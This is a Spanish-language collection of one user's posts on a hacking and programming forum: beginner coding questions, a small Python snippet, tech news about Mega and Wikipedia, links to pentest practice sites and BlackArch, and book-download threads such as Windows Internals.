   /*Este trozo comprueba que está todo bien y para el programa*/
   return 0;
}


Comento dev c++ lo tengo instalado en un disco secundario, ¿Tiene algo que ver?. Lo tengo tambien en una máquina virtual y me funciona bien. Ojala me pudieseis ayudar a dar con el motivo, y desde ya agradeceros las molestias y todas las respuestas. :)
#23
Manual desarrollador de software en arquitecturas ia 32-64







No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Espero a alguien pueda serle util
#24
Muy buenas a todos, el motivo de la consulta es que cada vez que pongo una web inexistente aparece en forma de ftp los archivos de xamp. Alguien sabe el por que??  no encuentro el motivo en google ni sé como buscarlo, A ver si alguien me puede echar un cablecillo por favor. Adjunto foto para que veais más detalles que quizás para mi son invisibles
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Gracias :)
#25
Kim Dotcom: "No confíes en Mega"



Mega, el que iba a ser el servicio que salvaría a internet de las grandes potencias, en palabras de su fundador, parece que no va a ser la utopía que muchos estaban esperando, o al menos, ya no lo va a ser tanto. Resulta que en una entrevista a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, el propio fundador de Megaupload y después de Mega, Kim Dotcom, ha renegado del servicio, llegando incluso a indicar, que no nos fiemos de Mega.

En este sentido, el magnate del servicio de almacenamiento de archivos (vídeo, mensajería, y quién sabe quién qué más) ha dejado bien claro que ya no está involucrado en Mega, ni tan poco está relacionado con la parte administrativa o como miembro del consejo. El polémico fundador de Mega, ha abandonado el barco, ahora
en manos de un magnate chino[/br], que resulta que se ha hecho con un gran volumen de la compañía a través de una compra hostil de un gran volumen de acciones, y que por cierto, está en busca y captura en China por fraude.

"Ya no estoy involucrado en Mega. Tampoco en un puesto administrativo o como accionista. La compañía se ha visto afectada por una compra hostil por parte de un inversor chino que está buscado en su país por fraude. Usó una serie de hombres de paja para acumular más y más acciones de Mega." - Kim Dotcom.

De momento es pronto para conocer más detalles del tema, pero una cosa está clara: si su propio fundador no se fía del comprador de un gran volumen de su empresa, quizás no sea buen momento para utilizar Mega, al menos hasta comprobar si, efectivamente, el nuevo dueño tiene las manos limpias o tan sucias como el propio Kim Dotcom dice que tiene.

Fuente No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#26
Buenas, quizás muchos  lo sepan o han practicado alguna vez con alguna herramienta de este estilo. Para los nuevos o los que desconocian este tipo de cosas os presento de la mano de la web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta un recopilatorio para que podamos practicar sin perjudicar a nadie, para el que se pregunte. Como puedo aprender sin meterme en el ordenador de mi vecino???  Pues chico entra aqui y verás No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Pd: Espero que os guste.
#27
Muy buenas aqui os dejo un pequeño código

Código: python

#-------------------------------------------------------------------------------
# Name:        Que muestre la n-esima de un numero leido por teclado entre 2-100
# Purpose:
#
# Author:      Windux
#
# Created:     17/07/2015
# Copyright:   (c) Propietario 2015
# Licence:     Gratis  me oyes  graa tiiis
#-------------------------------------------------------------------------------
numero = 0

while (numero <= 0):
    print "Por favor inserte un número superior a 0"
    numero = int(raw_input('Introduzca un numero:  '))

for raiz in range(2,101):
    print 'La raiz cuadrada de %d es %d '% (numero, numero**raiz)


Gracias  a @yavi por explicarme que era la n-esima que no entenida muy bien. 
Frase comica: A que te dedicas???  pues basicamente a respirar, no gano mucho... pero me da para vivir :)
#28
Recientemente con el hackeo a haking team, vi que en la empresa de haking team decia que ahora todo el mundo podría usar esa información a atacar a cualquiera.

El debate es la información que se filtra de esas empresas, deberia de ser publica toda o se debería de seleccionar la información?

Yo pienso que en este tipo de casos, se debería de liberar datos de software una vez se hayan tratado con las distintas empresas los 0 days, ya que a día de hoy nos encontramos que la empresa firefox a bloqueado temporalmente el flash y algo por el estilo puede pasar con java. Además en este caso había en una sección de los datos, fotos de personas ajenas a todo este tinglao. Hay que tener moral tanto para trabajar como para hackear....

¿qué pensais vosotros?
#29
GNU/Linux / Para los amantes de ARCHLINUX
Julio 14, 2015, 01:53:02 PM
Muy buenas en esta entrega os dejaré una url para mutar hacer una simbiosis transformar o como querais llamarlo, vuestro archlinux y convertirlo en blackarch con mas de 1200 herramientas para pentester No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Modificado, gracias por avisar :)
#30


WINDOWS INTERNALS 6 EDITION







DESCRIPCIÓN



Windows Internals, sexta edición cubre la parte interna de los componentes del núcleo central de los sistemas operativos Windows 7 y Windows Server 2008 R2. Este clásico libro le ayudará a:

  • Entender cómo trabajan el núcleo del sistema y los mecanismos de gestión—desde el administrador de objetos a los servicios en el registro.
  • Explorar las estructuras de datos del sistema interno utilizando herramientas como el depurador del núcleo.
  • Captar la prioridad del programador y los algoritmos de colocación de la CPU.
  • Ir dentro del modelo de seguridad de Windows para ver cómo se autoriza el acceso a los datos.
  • Entender cómo Windows administra la memoria física y virtual.
  • Recorrer la pila de red de Windows, de arriba a abajo— incluyendo APIs, controladores de protocolo y controladores del adaptador de red.
  • Solucionar problemas de acceso del sistema de archivos y problemas de arranque del sistema.
  • Aprender cómo analizar los accidentes.

Sexta en la serie, esta edición fue escrita de nuevo por Mark Russinovich, Technical Fellow en Azure Group de Microsoft; David Salomón, un experto en sistemas operativos y profesor del funcionamiento interno de Windows; y Alex Ionescu, Chief Architect de CrowdStrike y especializado en componentes internos y seguridad de sistemas operativos. Además de actualizaciones para cambios en Windows, hay muchos nuevos experimentos y ejemplos que resaltan el uso de herramientas existentes y nuevas de Sysinternals.




CONTENIDO



Parte 1
    Capítulo 1 Conceptos y Herramientas
    Capítulo 2 Arquitectura del Sistema
    Capítulo 3 Mecanismos del Sistema
    Capítulo 4 Mecanismos de Gestión
    Capítulo 5 Procesos, Hilos y Trabajos
    Capítulo 6 Seguridad
    Capítulo 7 Redes

Parte 2
    Capítulo 8 Sistema I/O
    Capítulo 9 Administración del almacenamiento
    Capítulo 10 Gestión de memoria
    Capítulo 11 Administrador de caché
    Capítulo 12 Sistemas de Archivos
    Capítulo 13 Arranque y Apagado
    Capítulo 14 Análisis de Volcado de Bloqueos




DESCARGAR




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#31
Wargames y retos / Para los amantes de los wargames
Julio 03, 2015, 03:01:56 AM
QUedan 14 dias para que se pongan en la web de cybercamp retos de todo tipo, si quereis visitar la web. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#32
Off Topic / Genial descubrimiento
Julio 02, 2015, 10:59:49 PM
Muy buenas a todos, realmente nosé si esto va aqui, moverlo sin problemas. La cuestión es que como muchos de aqui uso maquina virtual, uso siempre un windows, y tengo varias maquinas virtuales entre ellas una ubuntu.

Hoy he entrado, y me he conectado a gmail desde ubuntu, y al rato cuando quiero abrirlo desde windows, me dice que se ha abierto una cuenta desde tal sistema operativo, y me dice la ubicación desde que se produjo la conexión. Adjunto foto para curiosos




#33
Libros programación Python







Contenido:
– PDF search index rebuilder_.bpdx
– PDF search index_.pdx
– A Byte of Python, v1.20 (for Python 2.x) (2005).pdf
– A Byte of Python, v1.92 (for Python 3.0) (2009).pdf
– A Learner's Guide to Programming Using the Python Language (2009).pdf
– A Primer on Scientific Programming with Python (2009).pdf
– Beginning Game Development with Python and Pygame – From Novice to Professional (2007).pdf
– Beginning Python – From Novice to Professional, Second Edition (2008).pdf
– Beginning Python – Using Python 2.6 and Python 3.1 (2010).pdf
– Beginning Python (2005).pdf
– Beginning Python Visualization – Crafting Visual Transformation Scripts (2009).pdf
– Bioinformatics Programming Using Python, First Edition (2009).pdf
– CherryPy Essentials – Rapid Python Web Application Development (2007).pdf
– Core Python Programming, Second Edition (2006).chm
– Data Structures and Algorithms with Object-Oriented Design Patterns in Python (2003).chm
– Dive Into Python 3, r870 (2010).pdf
– Expert Python Programming (2008).pdf
– Foundations of Agile Python Development (2008).pdf
– Foundations of Python Network Programming (2004).djvu
– Game Programming with Python, Lua, and Ruby (2003).chm
– Game Programming with Python, Lua, and Ruby (2003).pdf
– Getting Started with Pyparsing (2007).pdf
– Gray Hat Python – Python Programming for Hackers and Reverse Engineers (2009).pdf
– GUI Programming with Python – QT Edition (2002).chm
– Guide to NumPy (for Python) (2006).pdf
– Hello World – Computer Programming for Kids and Other Beginners, Fourth printing (2009).pdf
– Invent Your Own Computer Games with Python (2008).pdf
– IronPython in Action (2009).pdf
– Jython For Java Programmers, First Edition (2001).chm
– Learning Python, Fourth Edition (2009).pdf
– Learning to Program – Python (2006).pdf
– Making Use of Python (2002).pdf
– Matplotlib for Python Developers (2009).pdf
– Mobile Python – Rapid Prototyping of Applications on the Mobile Platform (2007).pdf
– Natural Language Processing with Python (2009).pdf
– Next-Generation Web Frameworks in Python (2007).chm
– Numerical Methods in Engineering with Python (2005).pdf
– password.txt
– Perl To Python Migration (2001).chm
– Practical Programming – An Introduction to Computer Science Using Python, v.2009-5-6 (2009).pdf
– Pro IronPython (2009).pdf
– Professional Python Frameworks – Web 2.0 Programming with Django and TurboGears (2007).pdf
– Programming in Python 3 – A Complete Introduction to the Python Language, Second Edition (2010).pdf
– Programming Python, 3rd Edition (2006).chm
– Python – Create-Modify-Reuse (2008).pdf
– Python – How to Program, 1e (2002).pdf
– Python – Visual QuickStart Guide (2001).chm
– Python & XML – XML Processing with Python, First Edition (2002).pdf
– Python 2.1 Bible (2001).pdf
– Python 2.6 Quick Reference (Letter) (2009).pdf
– Python 3 for Absolute Beginners (2009).pdf
– Python Cookbook, 2nd Edition (2005).chm
– Python Cookbook, 2nd Edition (2005).pdf
– Python Developer's Handbook, First Edition (2000).pdf
– Python Essential Reference, Fourth Edition (2009).pdf
– Python for Dummies (2006).pdf
– Python for Software Design – How to Think Like a Computer Scientist (2009).pdf
– Python for Unix and Linux System Administration (2008).pdf
– Python in a Nutshell, 2nd Edition (2006).chm
– Python Phrasebook – Essential Code and Commands (2006).chm
– Python Pocket Reference, 4th Edition (2009).pdf
– Python Power – The Comprehensive Guide (2008).pdf
– Python Programming – An Introduction to Computer Science – v1.0rc2 (2002).pdf
– Python Programming for the Absolute Beginner (2003).chm
– Python Programming on Win32, First Edition (2000).chm
– Python Programming with the Java Class Libraries – A Tutorial for Building Web and Enterprise Applications w..
– Python Scripting for Computational Science, Third Edition (2008).pdf
– Python Testing – Beginner's Guide (2010).pdf
– Rapid GUI Programming with Python and Qt – The Definitive Guide to PyQt Programming (2008).pdf
– Rapid Web Applications with TurboGears – Using Python to Create Ajax-Powered Sites (2006).chm
– Snake Wrangling for Kids – Learning to Program with Python 2, linux-v0.7.2 (2007).pdf
– Snake Wrangling for Kids – Learning to Program with Python 2, mac-v0.7.2 (2007).pdf
– Snake Wrangling for Kids – Learning to Program with Python 2, win-v0.7.2 (2007).pdf
– Snake Wrangling for Kids – Learning to Program with Python 3, linux-v0.7.7 (2007).pdf
– Snake Wrangling for Kids – Learning to Program with Python 3, mac-v0.7.7 (2007).pdf
– Snake Wrangling for Kids – Learning to Program with Python 3, win-v0.7.7 (2007).pdf
– Starting Out with Python (2009).pdf
– Teach Yourself Python in 24 Hours (2000).chm
– Text Processing in Python (2003).chm
– The Definitive Guide to Jython – Python for the Java Platform (2010).pdf
– The Quick Python Book, Second Edition (2010).pdf
– Think Python – An Introduction to Software Design, v1.1.19 (2008).pdf
– Thinking in Tkinter (2005).html
– Thinking in Tkinter (2005).pdf
– Tkinter 8.4 reference – a GUI for Python (2010).pdf
– Twisted Network Programming Essentials – Event-driven Network Programming with Python (2005).chm
– wxPython in Action (2006).pdf
– XML Processing with Perl, Python, and PHP (2002).pdf
– PEP-8 Cheatsheet (2009).pdf
– Python 2.4 Quick Reference Card (Letter) (2007).pdf
– Python 2.5 Reference Card (2009).pdf
– Python 2.6 Cheatsheet (2008).pdf
– Python 2.6 Quick Reference (Letter) (2009).pdf
– Python Cheat Sheet (2009).pdf



Descargar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#34
Producir software libre de código libre
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#35


La enciclopedia libre más popular del mundo se ha alzado, por fin y tras ocho nominaciones anteriores en diferentes categorías, con el galardón Príncipe de Asturias de Cooperación Internacional 2015.
El Premio se otorga a aquellos "cuya labor con otro u otros en materias tales como la salud pública, la universalidad de la educación, la protección del medioambiente y el desarrollo social y económico, entre otras, constituya una aportación relevante a nivel internacional".
Wikipedia nació en el año 2001 de la mano de Jimmy Wales y Larry Sanger, como una empresa sin ánimo de lucro y que se financia gracias a los donativos de los usuarios. Desde entonces ha conseguido posicionarse entre las diez páginas más vistas de Internet, gracias a que está siendo actualizada constantemente por editores repartidos por todo el mundo.
El Jurado ha destacado que ha conseguido universalizar su contenido ya que actualmente cuenta con más de 37 millones de entradas activas, en una línea muy parecida a la que alcanzó el espíritu enciclopedista del siglo XVIII.
Wkipedia se ha impuesto a los sherpas de Nepal y al ex primer ministro de Portugal y Alto Comisionado de Naciones Unidas para los Refugiados, Antonio Guterres. Un total de 24 candidaturas correspondientes a diez países, entre las que estaban las Fuerzas Armadas Españolas y la Unesco, optaban al Premio.


Fuente:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#36
Ideas y Sugerencias / Idea de crear nuestos postcast
Junio 08, 2015, 12:18:10 PM
Buenas quería saber cuántas personas querrían participar en un postcast sobre noticias de seguridad, programación, dudas cuando alguien quiere empezar, recursos que se usan (básicos), claro que sí. Esto creo que podría venir bien a la hora de subir videos a youtube, si hay posibilidad de grabarnos.

La idea de esto no es poner un tiempo semanal o tal, simplemente poner la idea, y ver la gente y pensar una frecuencia de una un mes o lo que sea.  ¿Qué decís?
#37
Buenas, en el post del foro de grabiela habla del pensetbox y da la url, en chrome no me deja entrar pues pone esto.

Esta página web no está disponible

ERR_SSL_VERSION_OR_CIPHER_MISMATCH
Ocultar detalles
No se puede establecer una conexión segura porque este sitio utilizar un protocolo incompatible.

En firefox me va sin problema. Según he leido el problema es por la firma de certificado... ¿Es así me lo podeis confirmar, no me he enterado? de no ser asi, donde me puedo informar del problema?? La conclusion la he sacado de esta web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  gracias
#38
Muy buenas underc0ders mi duda es la siguiente. Hace poco adquiri una enciclopedia de informatica del año 1984, tiene muchísimos códigos tanto basic, assembler, c... claro los códigos son para spectrum, commodore y demás. Me gustaría poder probar código y aprender, y en un futuro actualizar todos los códigos en lenguajes actuales pues seguro puede servir a los principiantes como yo.

Despues de todo este parafazo, entendereis que no tengo esas micros, y queria saber si con un emulador podría ejecutar los códigos o tiene que ser en el sistema de cada micro... Espero se entienda la duda y cualquier info será bienvenida :)
#39
Off Topic / Aaron Swart
Mayo 29, 2015, 02:08:26 AM
Muchos lo conocereis, para quien no, o no entienda la importancia que tuvo, recomiendo verlo





pd: Espero que os guste
#40
Cursos, manuales y libros / Los códigos secretos
Mayo 23, 2015, 11:57:00 PM


LOS CÓDIGOS SECRETOS







RESUMEN DEL LIBRO
Un libro fascinante, original y muy ameno sobre el desciframiento de las claves y códigos secretos que han cambiado el curso de la historia, desde el Antiguo Egipto y María Estuardo, hasta las guerras mundiales y los actuales sistemas de comunicación a través del correo electrónico e Internet



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta